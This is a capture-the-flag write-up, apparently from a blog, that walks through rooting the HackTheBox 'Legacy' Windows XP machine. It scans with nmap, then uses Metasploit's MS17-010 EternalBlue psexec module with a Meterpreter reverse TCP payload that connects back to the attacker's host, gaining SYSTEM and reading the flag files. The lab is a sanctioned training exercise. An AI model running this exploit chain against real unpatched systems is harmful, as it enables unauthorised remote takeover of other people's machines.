Legacy HackTheBox WalkThrough
This is Legacy HackTheBox Walkthrough. In this writeup I have demonstrated step-by-step procedure how I rooted Legacy HTB box. Before starting let us know something about this box. It is a
windows box with IP address
10.10.10.4 and difficulty
easy assigned by it’s maker. There are two ways two solve this box either go manually or use
metasploit. I used the later one.
As always, connect your PC with
VPN and make sure your connectivity by pinging the IP 10.10.10.4. If failed to connect make sure Legacy Box is running over the lab. If all goes correct then it is time to start hacking.
I started by
scanning the box. Scanning give us the idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning too. Used
nmap to scan the machine. The result is as follows:-
$ nmap -sC -T3 -sV -oN legacy_scan.txt 10.10.10.4
Two ports namely 139 & 445 are open.
SMB service is running over them. nmap script
smb-os-discovery discovered that the running OS is
Windows XP. As soon as, I get SMB service running over windows machine up to windows 8, then first
exploit comes in my mind is
NSA's EternalBlue Doublepulsar, which was leaked by a
hacker group Shadow Broker in 2017. Read more about this exploit here.
This exploit suite contain 7 exploit modules in which
auxiliary/scanner/smb/smb_ms17_010 is a scanner module and others are exploiters. So tried each modules one by one and luckily
exploit/windows/smb/ms17_010_psexec gave me the
meterpreter shell. If you have newly installed Kali or Parrot OS then you may need to manually download this exploit from GitHub and install
wine package. Here is the complete guide to configure. If you have already configured it then fine. Let us exploit the box. Here is the steps, which I used to get meterpreter shell.
Getting Meterpreter Shell
msf5 > search eternalblue
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.10
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
We successfully have got a meterpreter shell. Used
$getuid command to check what privilege do we have.
meterpreter > getuid
NT AUTHORITY\SYSTEM which is the highest privilege a windows user has. This privilege is even higher than the privilege of an administrator account. Now we can capture our
user flag and
root flag. But, before this tried to upgrade the meterpreter shell to cmd prompt. Used
$shell command to upgrade the meterpreter shell to fully qualified shell.
meterpreter > shell
$ type \"Documents and Settings"\john\Desktop\user.txt
$ type \"Documents and Settings"\Administrator\Desktop\root.txt
This was how I rooted Legacy HackTheBox. Thanks for reading this walkthrough. Hope you guys have learnt some new things from this box writeup. Please share your experience within the comment section. For any problem and suggestion related to walkthrough, feel free to write us at [email protected].
Next upcoming retired box walkthrough is Devel.
For more walkthrough on HackTheBox, machine always visit https://ethicalhacs.com